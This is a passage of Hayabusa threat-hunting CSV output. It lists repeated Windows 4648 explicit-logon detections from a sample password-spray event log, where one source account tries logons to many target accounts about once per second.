Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: 